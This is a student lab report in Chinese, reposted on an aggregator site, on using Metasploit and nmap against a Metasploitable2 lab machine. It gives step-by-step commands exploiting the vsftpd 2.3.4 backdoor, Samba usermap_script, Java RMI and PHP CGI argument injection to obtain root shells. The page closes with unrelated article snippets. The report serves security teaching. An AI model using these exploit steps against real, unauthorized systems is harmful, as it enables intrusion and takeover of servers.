20222405 2024-2025-1 《网络与系统攻防技术》实验六实验报告

news/2024/11/17 0:32:14/文章来源:https://www.cnblogs.com/20222405chu/p/18549924

1.实验内容

经过高强度的攻击渗透操作,我现在已经熟练的掌握了Metasploit工具的用法,也深刻体会到漏洞的可怕之处,这些漏洞会严重威胁到我们的隐私安全。

2.实验过程

(1)前期渗透

①主机发现

输入命令msfconsole进入控制台

search arp_sweep搜索一下

成功找到

输入use 0使用auxiliary/scanner/discovery/arp_sweep

先ifconfig看一下靶机的ip地址

可以看到靶机的ip地址是192.168.50.175

这时我们set RHOSTS 192.168.50.175设置目标ip地址

然后exploit

图中可以看出成功发现主机192.168.50.175

②端口扫描

输入命令nmap -sT 192.168.50.175进行扫描

扫描结果如图

③扫描系统和漏洞

输入nmap -sV 192.168.50.175查看服务版本信息

输入nmap -O 192.168.50.175查看操作系统信息

输入nmap --script=vuln 192.168.50.175进行漏洞扫描

(2)Vsftpd源码包后门漏洞(21端口)

漏洞简介:Vsftpd(Very Secure FTP Daemon)2.3.4版本的源码包被植入了恶意后门代码。这个漏洞的触发点是Vsftpd在接受用户名时,如果用户名包含特定字符串:),就会触发后门机制。

nmap -sV -p 21 192.168.50.175扫描一下目标端口的信息

可以看到21端口是开启的,而且vsftpd的版本是2.3.4,即存在漏洞的版本

接下来输入msfconsole启动控制台

search vsftpd搜索相关漏洞

use 1使用exploit/unix/ftp/vsftpd_234_backdoor

set RHOSTS 192.168.50.175设置目标ip地址

exploit开始攻击

输入uname -a、pwd、id、whoami、ifconfig等命令都可以成功执行并输出信息,可以证明攻击成功

(3)SambaMS-RPC Shell命令注入漏洞(端口139)

漏洞简介:Samba MS-RPC Shell命令注入漏洞(CVE-2007-2447)是Samba服务中的一个漏洞。攻击者通过端口139向远程Samba服务发送特制请求,可利用漏洞注入命令并以root权限执行,危害严重。

输入msfconsole启动控制台

search samba搜索相关漏洞

use exploit/multi/samba/usermap_script选择要使用的漏洞

set RHOSTS 192.168.50.175设置目标ip地址

exploit开始攻击

输入uname -a、pwd、id、whoami、ifconfig等命令都可以成功执行并输出信息,可以证明攻击成功

(4)Java RMI SERVER命令执行漏洞(1099端口)

漏洞简介:Java RMI Server命令执行漏洞(CVE-2011-3556)允许攻击者通过1099端口向RMI注册服务发送恶意序列化对象,触发远程代码执行,导致目标系统被完全控制,危害严重。

nmap -sV -p 1099 192.168.50.175扫描一下目标端口的信息

接下来输入msfconsole启动控制台

search rmi搜索相关漏洞

use exploit/multi/misc/java_rmi_server选择要使用的漏洞

set RHOSTS 192.168.50.175设置目标ip地址

exploit开始攻击

进入了meterpreter后输入sessions -i 1shell

这时输入uname -a、pwd、id、whoami、ifconfig等命令都可以成功执行并输出信息,可以证明攻击成功

(5)PHP CGI参数执行注入漏洞(80端口)

漏洞简介:PHP CGI参数执行注入漏洞(CVE-2012-1823)允许攻击者通过80端口发送特制请求,利用未正确处理的参数在PHP CGI模式下执行任意命令,导致服务器被控制。

nmap -sV -p 80 192.168.50.175扫描一下目标端口的信息

接下来输入msfconsole启动控制台

search php_cgi搜索相关漏洞

use 0使用exploit/multi/http/php_cei_arg_injection

set RHOSTS 192.168.50.175设置目标ip地址

exploit开始攻击

进入了meterpreter后输入sessions -i 1shell

输入uname -a、pwd、id、whoami等命令都可以成功执行并输出信息,可以证明攻击成功

3.问题及解决方案

问题1:靶机Metasploitable2的网络配置不正确,导致无法正常通信。

问题1解决方案:将靶机网络模式设置为与攻击机一致,确保二者的ip地址在同一网段。

4.学习感悟、思考等
在这次实验中,我更加熟练的掌握了如何使用Metasploit进行渗透测试,了解到如何通过扫描端口和发现漏洞来攻击目标系统。具体学习了几个常见的漏洞利用方法,如Vsftpd后门漏洞、Samba命令注入漏洞、Java RMI执行漏洞和PHP CGI注入漏洞,并通过Metasploit成功地利用这些漏洞获取目标主机的控制权限。通过这些实践,我深刻感受到漏洞利用不仅需要理论知识,更要有动手实践的能力,只有不断操作,才能真正理解攻击背后的原理。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/834860.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

第五章

5.1 节练习 练习 5.1 空语句是最简单的语句,空语句由一个单独的分号构成。如果在程序的某个地方,语法上需要一条语句但是逻辑上不需要,此时应该使用空语句,空语句什么也不做。 一种常见的情况是,当循环的全部工作在条件部分就可以完成时,我们通常会用到空语句。使用空语句…

AI独立开发完全指南:从Cursor到变现的实战攻略

大家好,我是加加,今天给大家分享的是用 cursor 实现复杂创意想法。近期参加了圈子里的 cursor 培训,当了回教练,以下是我分享的那节课的主要内容,分享给初学者想要入门AI独立开发的朋友。这几乎就是逐字稿了,但是生生的让我给读成了磕磕绊绊,我这口头表达能力啊,真是太…

OCS助手配置

使用准备:装有Edge浏览器的电脑鼠标眼睛一双灵活的手一颗勇敢不放弃的心♥安装流程 1.安装油猴插件 2.安装油猴脚本-OCS助手 3.配置OCS助手 4.启动刷课 教程开始 1.安装油猴插件打开Edge浏览器的主页2.点击三个点点点击扩展3.点击"打开MIcrosoft Edge加载项"4.在左边…

测试笔记1

测试笔记1 ​​

Win11安装kali子系统

Win11安装kali子系统 1. 开启服务,更新wsl2 启用或关闭Windows功能 -> 开启适用于Linux的Windows子系统wsl --update #更新到wsl2`wsl --status #检查一下`2. 安装kali,换源配置工具 wsl --install kali-linux #安装kali-linux`换源中科大源,会变快很多,将官方源…

002.测试2

002.测试2 ​​ ‍

第三篇:Scrum冲刺博客

冲刺博客:Day 3 - 数据处理与设计细化 站立式会议照片: ![站立式会议 - Day 3](链接到Day 3的照片) 工作进展:许莹柔(机器学习工程师):昨日完成:数据集预处理工作开始。 今日计划:继续数据集预处理,并开始模型训练。 遇到的困难:数据集存在一些异常值需要处理。肖晓霞…

CPP 智能指针

CPP 智能指针Created: 2024-06-30T20:43+08:00 Published: 2024-11-16T23:17+08:00 Categories: C-CPP智能指针的作用 智能指针最初使的作用就是离开作用域调用析构函数。 因为 malloc 出来的东西只能通过指针持有,栈上的对象在离开作用域后会自动调用析构函数,但是裸指针会不…

先天软工圣体队——冲刺日记(第三天)

1. 每位团队成员的分工与进度成员 完成的任务 完成的任务时长 剩余时间何愉心、邱雨涵 对以及会议进行记录与vlog剪辑 3小时 1小时陈思雨,郑奇键 添加资料库滑动框,美化UI 2小时 2小时陈尚冰 ”登录“”注册“页面的开发,安全性强化 5小时 2小时柯鸿毅 API拓展功能完善 2小时…